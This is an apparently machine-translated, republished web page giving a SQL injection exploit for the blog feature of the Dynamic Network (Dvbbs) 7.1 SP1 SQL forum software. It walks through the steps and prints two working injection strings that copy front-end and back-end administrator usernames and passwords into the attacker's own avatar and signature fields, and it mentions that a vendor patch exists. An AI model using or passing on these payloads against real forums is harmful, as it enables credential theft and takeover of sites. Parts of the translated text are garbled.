Dynamic Network 7.1 SP1 SQL blog Vulnerability

Source: Internet
Author: User
For the SQL version of the dynamic network 7.1 system. Open the blog feature
Login http://bbs.xxx.com/bokeindex.asp
Click "blog management" and set keywords after logging on.
Write the dynamic network SQL Injection statement in "link address ".
Example: 123123 'where 1 = 0; update dv_user set userface = (select top 1 username from dv_user where userclass = 'admin '), usersign = (select top 1 userpassword from dv_user where userclass = 'postmaster ') Where username = 'four-eye-removal I '--
Submit the modification. After the submission is successful, go to the mobile network forum homepage and log on to your member account, open "Modify basic information" in "User Control Panel", and you can see that the displayed front-end Administrator account and password have been displayed in the custom avatar and signature.

2. Obtain the username and password of the background administrator, and place them in the Custom profile picture and signature respectively. You can view the user's basic information.
123123 'where 1 = 0; update dv_user set userface = (select top 1 username from dv_admin), usersign = (select top 1 password from dv_admin) Where username = 'four eyes new '--
BCT has released a security patch in March 8 ....
The current success rate is not very high. Set up verification on your own.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.